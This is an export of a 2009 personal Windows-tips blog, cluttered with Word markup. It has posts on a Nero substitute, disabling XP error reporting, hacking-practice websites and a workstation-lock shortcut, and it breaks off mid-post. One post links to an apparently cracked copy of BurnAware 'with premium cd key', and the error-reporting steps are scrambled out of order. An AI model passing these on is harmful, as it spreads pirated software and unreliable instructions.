&lt;w:ignoremixedcontent&gt;false&lt;/w:IgnoreMixedContent&gt;   &lt;w:alwaysshowplaceholdertext&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;   &lt;w:compatibility&gt;    &lt;w:breakwrappedtables/&gt;    &lt;w:snaptogridincell/&gt;    &lt;w:wraptextwithpunct/&gt;    &lt;w:useasianbreakrules/&gt;    &lt;w:dontgrowautofit/&gt;   &lt;/w:Compatibility&gt;   &lt;w:browserlevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;  &lt;/w:WordDocument&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:latentstyles deflockedstate="false" latentstylecount="156"&gt;  &lt;/w:LatentStyles&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;style&gt; &lt;!--  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-parent:""; 	margin:0in; 	margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} p.white, li.white, div.white 	{mso-style-name:white; 	mso-margin-top-alt:auto; 	margin-right:0in; 	mso-margin-bottom-alt:auto; 	margin-left:0in; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} @page Section1 	{size:8.5in 11.0in; 	margin:1.0in 1.25in 1.0in 1.25in; 	mso-header-margin:.5in; 	mso-footer-margin:.5in; 	mso-paper-source:0;} div.Section1 	{page:Section1;}  /* List Definitions */  @list l0 	{mso-list-id:82649825; 	mso-list-type:hybrid; 	mso-list-template-ids:1668981234 67698703 67698713 67698715 67698703 67698713 67698715 67698703 67698713 67698715;} @list l0:level1 	{mso-level-tab-stop:.5in; 	mso-level-number-position:left; 	text-indent:-.25in;} ol 	{margin-bottom:0in;} ul 	{margin-bottom:0in;} --&gt; &lt;/style&gt;&lt;!--[if gte mso 10]&gt; &lt;style&gt;  /* Style Definitions */  table.MsoNormalTable 	{mso-style-name:"Table Normal"; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-parent:""; 	mso-padding-alt:0in 5.4pt 0in 5.4pt; 	mso-para-margin:0in; 	mso-para-margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:10.0pt; 	font-family:"Times New Roman"; 	mso-ansi-language:#0400; 	mso-fareast-language:#0400; 	mso-bidi-language:#0400;} &lt;/style&gt; &lt;![endif]--&gt;  &lt;p class="white"  style="text-align: justify; color: rgb(255, 255, 255);font-family:arial;"&gt;&lt;span style="font-size:100%;"&gt;I got a couple of mails last week asking me for a suitable substitute for Nero.The guy had apparently not uninstalled Nero properly n to avoid the problem he had deleted the nero directory with all its content .Now when he was reinstalling Nero it wasn’t working.I l deal this part of the problem later ,on how to make Nero work again but now the solution to the first part of the problem.,that is SUBSTITUTE&lt;span style=""&gt;  &lt;/span&gt;FOR NERO.Well I found this amazing software called &lt;b style=""&gt;BURNAWARE&lt;/b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="white"  style="text-align: justify; color: rgb(255, 255, 255);font-family:arial;"&gt;&lt;span style="font-size:100%;"&gt;&lt;span style=""&gt; &lt;/span&gt;BurnAware Professional is the professional’s choice for quality CD &amp;amp; DVD media duplication and Blu-ray Disc recording. Apart from the standard features, such as data, audio and video burning, BurnAware Professional offers a wide scope of advanced functionality, allowing you to duplicate CDs and DVDs, make exact copies of discs on your hard drive, write to multiple drives simultaneously. Also it is permitted for commercial use.What really attracted me to this software so much are:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="white" face="arial" style="margin-left: 0.25in; text-align: justify; color: rgb(0, 0, 0); font-family: arial;"&gt;&lt;!--[if !supportLists]--&gt;&lt;meta equiv="Content-Type" content="text/html; charset=utf-8"&gt;&lt;meta name="ProgId" content="Word.Document"&gt;&lt;meta name="Generator" content="Microsoft Word 11"&gt;&lt;meta name="Originator" content="Microsoft Word 11"&gt;&lt;link rel="File-List" href="file:///C:%5CDOCUME%7E1%5Carka%5CLOCALS%7E1%5CTemp%5Cmsohtml1%5C01%5Cclip_filelist.xml"&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:worddocument&gt;   &lt;w:view&gt;Normal&lt;/w:View&gt;   &lt;w:zoom&gt;0&lt;/w:Zoom&gt;   &lt;w:punctuationkerning/&gt;   &lt;w:validateagainstschemas/&gt;   &lt;w:saveifxmlinvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;   &lt;w:ignoremixedcontent&gt;false&lt;/w:IgnoreMixedContent&gt;   &lt;w:alwaysshowplaceholdertext&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;   &lt;w:compatibility&gt;    &lt;w:breakwrappedtables/&gt;    &lt;w:snaptogridincell/&gt;    &lt;w:wraptextwithpunct/&gt;    &lt;w:useasianbreakrules/&gt;    &lt;w:dontgrowautofit/&gt;   &lt;/w:Compatibility&gt;   &lt;w:browserlevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;  &lt;/w:WordDocument&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:latentstyles deflockedstate="false" latentstylecount="156"&gt;  &lt;/w:LatentStyles&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;style&gt; &lt;!--  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-parent:""; 	margin:0in; 	margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} a:link, span.MsoHyperlink 	{color:blue; 	text-decoration:underline; 	text-underline:single;} a:visited, span.MsoHyperlinkFollowed 	{color:purple; 	text-decoration:underline; 	text-underline:single;} p.white, li.white, div.white 	{mso-style-name:white; 	mso-margin-top-alt:auto; 	margin-right:0in; 	mso-margin-bottom-alt:auto; 	margin-left:0in; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} @page Section1 	{size:8.5in 11.0in; 	margin:1.0in 1.25in 1.0in 1.25in; 	mso-header-margin:.5in; 	mso-footer-margin:.5in; 	mso-paper-source:0;} div.Section1 	{page:Section1;} --&gt; &lt;/style&gt;&lt;!--[if gte mso 10]&gt; &lt;style&gt;  /* Style Definitions */  table.MsoNormalTable 	{mso-style-name:"Table Normal"; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-parent:""; 	mso-padding-alt:0in 5.4pt 0in 5.4pt; 	mso-para-margin:0in; 	mso-para-margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:10.0pt; 	font-family:"Times New Roman"; 	mso-ansi-language:#0400; 	mso-fareast-language:#0400; 	mso-bidi-language:#0400;} &lt;/style&gt; &lt;![endif]--&gt;  &lt;/p&gt;&lt;p class="white" style="margin-left: 0.5in; text-align: justify; text-indent: -0.25in;"&gt;&lt;span style="font-size: 13.5pt; font-family: Arial; color: rgb(204, 255, 255);"&gt;1. Its only 14Mb in size and you can perform all cd/dvd writing functions with it. &lt;/span&gt;&lt;span style="font-family: Arial; color: rgb(204, 255, 255);"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;u1:p&gt;&lt;/u1:p&gt;  &lt;p class="white" style="margin-left: 0.5in; text-align: justify; text-indent: -0.25in;" face="arial"&gt;&lt;span style="font-size: 13.5pt; font-family: Arial; color: rgb(204, 255, 255);"&gt;2. It can burn BLU-RAY Discs&lt;/span&gt;&lt;span style="font-family: Arial; color: rgb(204, 255, 255);"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;u1:p&gt;&lt;/u1:p&gt;  &lt;p class="white" style="margin-left: 0.5in; text-align: justify; text-indent: -0.25in;" face="arial"&gt;&lt;span style="font-size: 13.5pt; font-family: Arial; color: rgb(204, 255, 255);"&gt;3. It uses comparatyively much lesser memory resources than Nero ,like I am simultaneously writing a Movie DVD while posting in this blog using my 4 year old PC&lt;/span&gt;&lt;span style="font-family: Arial; color: rgb(204, 255, 255);"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;u1:p&gt;&lt;/u1:p&gt;  &lt;p class="white" style="margin-left: 0.25in; text-align: justify;" face="arial"&gt;&lt;span style="font-size: 13.5pt; font-family: Arial; color: rgb(204, 255, 255);"&gt;&lt;u1:p&gt;&lt;/u1:p&gt;Here are the links for downloading the software Burnaware professional with premium cd key and unlimited license&lt;/span&gt;&lt;span style="font-family: Arial; color: rgb(204, 255, 255);"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="white" style="margin-left: 0.25in; text-align: justify;" face="arial"&gt; &lt;meta equiv="Content-Type" content="text/html; charset=utf-8"&gt; &lt;span style="font-size: 13.5pt; font-family: Arial; color: black;"&gt;&lt;a href="http://www.ziddu.com/download/4499042/BURNAWAREPROFESSIONAL.rar.html"&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;u2:worddocument&gt;   &lt;u2:view&gt;Normal&lt;u2:zoom&gt;0&lt;u2:punctuationkerning/&gt;     &lt;u2:validateagainstschemas/&gt;     &lt;u2:saveifxmlinvalid&gt;false&lt;u2:ignoremixedcontent&gt;false&lt;u2:alwaysshowplaceholdertext&gt;false&lt;u2:compatibility&gt;         &lt;u2:breakwrappedtables/&gt;         &lt;u2:snaptogridincell/&gt;         &lt;u2:wraptextwithpunct/&gt;         &lt;u2:useasianbreakrules/&gt;         &lt;u2:dontgrowautofit/&gt;         &lt;u2:browserlevel&gt;MicrosoftInternetExplorer4&lt;/u2:browserlevel&gt;        &lt;/u2:compatibility&gt;       &lt;/u2:alwaysshowplaceholdertext&gt;      &lt;/u2:ignoremixedcontent&gt;     &lt;/u2:saveifxmlinvalid&gt;    &lt;/u2:zoom&gt;   &lt;/u2:view&gt;  &lt;/u2:worddocument&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;u3:latentstyles deflockedstate="false" latentstylecount="156"&gt;  &lt;/u3:latentstyles&gt; &lt;/xml&gt;&lt;![endif]--&gt;http://www.ziddu.com/download/4499042/BURNAWAREPROFESSIONAL.rar.html&lt;/a&gt;&lt;/span&gt;&lt;span style="font-family: Arial; color: black;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt; &lt;br /&gt;&lt;span style="font-size:130%;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;  &lt;p class="white" style="margin-left: 0.25in; text-align: justify; color: rgb(0, 0, 0); font-family: arial;"&gt;&lt;span style="font-size:130%;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt; &lt;span style="color: rgb(0, 0, 0); font-family: arial;font-family:arial;font-size:130%;"  &gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1561084088417243739-2896909680438820783?l=arkatechie.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://arkatechie.blogspot.com/feeds/2896909680438820783/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://arkatechie.blogspot.com/2009/04/normal-0-false-false-false_27.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/2896909680438820783'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/2896909680438820783'/><link rel='alternate' type='text/html' href='http://arkatechie.blogspot.com/2009/04/normal-0-false-false-false_27.html' title='BURNAWARE'/><author><name>Arka</name><uri>http://www.blogger.com/profile/07638533523649579733</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' src='http://4.bp.blogspot.com/_T53992hHLOM/ScVQvNBIyDI/AAAAAAAAADU/b7xTeuaNoGc/S220/maaaaaaaaaaaaapic.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_T53992hHLOM/SfYgYRf5aLI/AAAAAAAAAJQ/OPZQfGlVi_Q/s72-c/boxshot_pro_big.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1561084088417243739.post-3222844307124518016</id><published>2009-04-26T02:46:00.000-07:00</published><updated>2009-04-26T12:09:40.288-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='windows'/><title type='text'>TURN OFF ERRROR REPORTING</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_T53992hHLOM/SfA5y_nyiPI/AAAAAAAAAI4/UL5HZH1xvLc/s1600-h/microsoft_application_error_reporting.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 252px;" src="http://4.bp.blogspot.com/_T53992hHLOM/SfA5y_nyiPI/AAAAAAAAAI4/UL5HZH1xvLc/s400/microsoft_application_error_reporting.jpg" alt="" id="BLOGGER_PHOTO_ID_5327821907413862642" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;meta equiv="Content-Type" content="text/html; charset=utf-8"&gt;&lt;meta name="ProgId" content="Word.Document"&gt;&lt;meta name="Generator" content="Microsoft Word 11"&gt;&lt;meta name="Originator" content="Microsoft Word 11"&gt;&lt;link rel="File-List" href="file:///C:%5CDOCUME%7E1%5Carka%5CLOCALS%7E1%5CTemp%5Cmsohtml1%5C01%5Cclip_filelist.xml"&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:worddocument&gt;   &lt;w:view&gt;Normal&lt;/w:View&gt;   &lt;w:zoom&gt;0&lt;/w:Zoom&gt;   &lt;w:punctuationkerning/&gt;   &lt;w:validateagainstschemas/&gt;   &lt;w:saveifxmlinvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;   &lt;w:ignoremixedcontent&gt;false&lt;/w:IgnoreMixedContent&gt;   &lt;w:alwaysshowplaceholdertext&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;   &lt;w:compatibility&gt;    &lt;w:breakwrappedtables/&gt;    &lt;w:snaptogridincell/&gt;    &lt;w:wraptextwithpunct/&gt;    &lt;w:useasianbreakrules/&gt;    &lt;w:dontgrowautofit/&gt;   &lt;/w:Compatibility&gt;   &lt;w:browserlevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;  &lt;/w:WordDocument&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:latentstyles deflockedstate="false" latentstylecount="156"&gt;  &lt;/w:LatentStyles&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;style&gt; &lt;!--  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-parent:""; 	margin:0in; 	margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} p 	{mso-margin-top-alt:auto; 	margin-right:0in; 	mso-margin-bottom-alt:auto; 	margin-left:0in; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} @page Section1 	{size:8.5in 11.0in; 	margin:1.0in 1.25in 1.0in 1.25in; 	mso-header-margin:.5in; 	mso-footer-margin:.5in; 	mso-paper-source:0;} div.Section1 	{page:Section1;} --&gt; &lt;/style&gt;&lt;!--[if gte mso 10]&gt; &lt;style&gt;  /* Style Definitions */  table.MsoNormalTable 	{mso-style-name:"Table Normal"; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-parent:""; 	mso-padding-alt:0in 5.4pt 0in 5.4pt; 	mso-para-margin:0in; 	mso-para-margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:10.0pt; 	font-family:"Times New Roman"; 	mso-ansi-language:#0400; 	mso-fareast-language:#0400; 	mso-bidi-language:#0400;} &lt;/style&gt; &lt;![endif]--&gt;  &lt;p&gt;&lt;b&gt;If error reporting in XP is bugging you then turn it off.&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;When XP encounters a system , a little dialog box appears asking if you want to report the error to Microsoft. Click the message box to make it disappear. You don't have to report the error if you don't want to and on today's "Call for Help" Here is a way&lt;span style=""&gt;  &lt;/span&gt;how to turn off tab on your System Properties dialog box.&lt;br /&gt;3. Click the Error Reporting button on the Advanced tab.&lt;br /&gt;4. Place a checkmark the feature if you find it distracting.&lt;br /&gt;&lt;br /&gt;To disable error reporting, follow these instructions:&lt;br /&gt;&lt;br /&gt;1. Right-click My Computer and choose Properties.&lt;br /&gt;2. Click the Advanced next to "Disable error reporting."&lt;br /&gt;5. Leave the other radio button unchecked next to the text labeled, "But notify me when critical errors occur."&lt;br /&gt;6. Click OK.&lt;/p&gt;&lt;br /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1561084088417243739-3222844307124518016?l=arkatechie.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://arkatechie.blogspot.com/feeds/3222844307124518016/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://arkatechie.blogspot.com/2009/04/turn-off-errror-reporting.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/3222844307124518016'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/3222844307124518016'/><link rel='alternate' type='text/html' href='http://arkatechie.blogspot.com/2009/04/turn-off-errror-reporting.html' title='TURN OFF ERRROR REPORTING'/><author><name>Arka</name><uri>http://www.blogger.com/profile/07638533523649579733</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' src='http://4.bp.blogspot.com/_T53992hHLOM/ScVQvNBIyDI/AAAAAAAAADU/b7xTeuaNoGc/S220/maaaaaaaaaaaaapic.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_T53992hHLOM/SfA5y_nyiPI/AAAAAAAAAI4/UL5HZH1xvLc/s72-c/microsoft_application_error_reporting.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1561084088417243739.post-3152654370074289288</id><published>2009-04-25T04:33:00.000-07:00</published><updated>2009-04-30T13:11:26.290-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='HACKING'/><title type='text'>WEBSITES OFFERING HELP IN HACKING</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_T53992hHLOM/SfA2dDyFKyI/AAAAAAAAAIo/2Ubw4vgHDdQ/s1600-h/hack+this+site.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 235px;" src="http://4.bp.blogspot.com/_T53992hHLOM/SfA2dDyFKyI/AAAAAAAAAIo/2Ubw4vgHDdQ/s400/hack+this+site.jpg" alt="" id="BLOGGER_PHOTO_ID_5327818232038763298" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Here are some websites that shall help you. Not all sites listed here will make you the ultimate hacker finally, but shall help you towards your goal&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;http://www.freestuffhotdeals.com/hacker/1.html&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Just a site to test your GK. But. Try using to reach all the levels. Not just the last level. (Skill : Directory Snooping.)&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;www.hack-test.com&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Hmm.. Gives you the positive energy to move forward to your goal. Not exactly hacking. But something close to that. Google powers&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;www.hackthissite.org&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;The real beginning. Refine skills as a Beginner. Very Effective.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;www.hellboundhackers.com&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;One step ahead. Things look tough and creepy.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;www.corruptcode.com&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Hmmm.. Not that Easy. Things look not that bad.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1561084088417243739-3152654370074289288?l=arkatechie.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://arkatechie.blogspot.com/feeds/3152654370074289288/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://arkatechie.blogspot.com/2009/04/websites-offering-help-in-hacking.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/3152654370074289288'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/3152654370074289288'/><link rel='alternate' type='text/html' href='http://arkatechie.blogspot.com/2009/04/websites-offering-help-in-hacking.html' title='WEBSITES OFFERING HELP IN HACKING'/><author><name>Arka</name><uri>http://www.blogger.com/profile/07638533523649579733</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' src='http://4.bp.blogspot.com/_T53992hHLOM/ScVQvNBIyDI/AAAAAAAAADU/b7xTeuaNoGc/S220/maaaaaaaaaaaaapic.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_T53992hHLOM/SfA2dDyFKyI/AAAAAAAAAIo/2Ubw4vgHDdQ/s72-c/hack+this+site.jpg' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1561084088417243739.post-147701449241098222</id><published>2009-04-25T03:02:00.000-07:00</published><updated>2009-04-25T03:03:26.346-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='windows'/><title type='text'>LOCK UP YOUR PC</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_T53992hHLOM/SfA90pOtcuI/AAAAAAAAAJA/MsZVLgkLQ6w/s1600-h/key_ani1.gif"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 377px; height: 400px;" src="http://2.bp.blogspot.com/_T53992hHLOM/SfA90pOtcuI/AAAAAAAAAJA/MsZVLgkLQ6w/s400/key_ani1.gif" alt="" id="BLOGGER_PHOTO_ID_5327826333809341154" border="0"&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;meta http-equiv="Content-Type" content="text/html; charset=utf-8"&gt;&lt;meta name="ProgId" content="Word.Document"&gt;&lt;meta name="Generator" content="Microsoft Word 11"&gt;&lt;meta name="Originator" content="Microsoft Word 11"&gt;&lt;link rel="File-List" href="file:///C:%5CDOCUME%7E1%5Carka%5CLOCALS%7E1%5CTemp%5Cmsohtml1%5C01%5Cclip_filelist.xml"&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:WordDocument&gt;   &lt;w:View&gt;Normal&lt;/w:View&gt;   &lt;w:Zoom&gt;0&lt;/w:Zoom&gt;   &lt;w:PunctuationKerning/&gt;   &lt;w:ValidateAgainstSchemas/&gt;   &lt;w:SaveIfXMLInvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;   &lt;w:IgnoreMixedContent&gt;false&lt;/w:IgnoreMixedContent&gt;   &lt;w:AlwaysShowPlaceholderText&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;   &lt;w:Compatibility&gt;    &lt;w:BreakWrappedTables/&gt;    &lt;w:SnapToGridInCell/&gt;    &lt;w:WrapTextWithPunct/&gt;    &lt;w:UseAsianBreakRules/&gt;    &lt;w:DontGrowAutofit/&gt;   &lt;/w:Compatibility&gt;   &lt;w:BrowserLevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;  &lt;/w:WordDocument&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:LatentStyles DefLockedState="false" LatentStyleCount="156"&gt;  &lt;/w:LatentStyles&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;style&gt; &lt;!--  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-parent:""; 	margin:0in; 	margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} p 	{mso-margin-top-alt:auto; 	margin-right:0in; 	mso-margin-bottom-alt:auto; 	margin-left:0in; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} @page Section1 	{size:8.5in 11.0in; 	margin:1.0in 1.25in 1.0in 1.25in; 	mso-header-margin:.5in; 	mso-footer-margin:.5in; 	mso-paper-source:0;} div.Section1 	{page:Section1;} --&gt; &lt;/style&gt;&lt;!--[if gte mso 10]&gt; &lt;style&gt;  /* Style Definitions */  table.MsoNormalTable 	{mso-style-name:"Table Normal"; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-parent:""; 	mso-padding-alt:0in 5.4pt 0in 5.4pt; 	mso-para-margin:0in; 	mso-para-margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:10.0pt; 	font-family:"Times New Roman"; 	mso-ansi-language:#0400; 	mso-fareast-language:#0400; 	mso-bidi-language:#0400;} &lt;/style&gt; &lt;![endif]--&gt;  &lt;p style="text-align: center;" align="center"&gt;&lt;b&gt;&lt;span style="font-size: 14pt; font-family: Arial;"&gt;You can lock your XP workstation with two clicks of&lt;br /&gt;the mouse. Create a new shortcut on your desktop using&lt;br /&gt;a right mouse click, and enter 'rundll32.exe&lt;br /&gt;user32.dll,LockWorkStation' in the location field.&lt;br /&gt;Give the shortcut a name you like. That's it -- just&lt;br /&gt;double click on it and your computer will be locked.&lt;br /&gt;And if that's not easy enough, Windows key + L will do&lt;br /&gt;the same. &lt;/span&gt;&lt;/b&gt;&lt;span style="font-size: 14pt; font-family: Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt; &lt;br /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1561084088417243739-147701449241098222?l=arkatechie.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://arkatechie.blogspot.com/feeds/147701449241098222/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://arkatechie.blogspot.com/2009/04/lock-up-your-pc.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/147701449241098222'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/147701449241098222'/><link rel='alternate' type='text/html' href='http://arkatechie.blogspot.com/2009/04/lock-up-your-pc.html' title='LOCK UP YOUR PC'/><author><name>Arka</name><uri>http://www.blogger.com/profile/07638533523649579733</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' src='http://4.bp.blogspot.com/_T53992hHLOM/ScVQvNBIyDI/AAAAAAAAADU/b7xTeuaNoGc/S220/maaaaaaaaaaaaapic.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_T53992hHLOM/SfA90pOtcuI/AAAAAAAAAJA/MsZVLgkLQ6w/s72-c/key_ani1.gif' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1561084088417243739.post-6814642186504829733</id><published>2009-04-24T04:41:00.000-07:00</published><updated>2009-04-24T06:46:42.294-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='windows'/><title type='text'>RENAME RECYCLE BIN</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_T53992hHLOM/SfA4fTmLhuI/AAAAAAAAAIw/VNrgncwoA4Y/s1600-h/dustbin.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 227px; height: 229px;" src="http://3.bp.blogspot.com/_T53992hHLOM/SfA4fTmLhuI/AAAAAAAAAIw/VNrgncwoA4Y/s400/dustbin.jpg" alt="" id="BLOGGER_PHOTO_ID_5327820469666809570" border="0"&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;meta equiv="Content-Type" content="text/html; charset=utf-8"&gt;&lt;meta name="ProgId" content="Word.Document"&gt;&lt;meta name="Generator" content="Microsoft Word 11"&gt;&lt;meta name="Originator" content="Microsoft Word 11"&gt;&lt;link 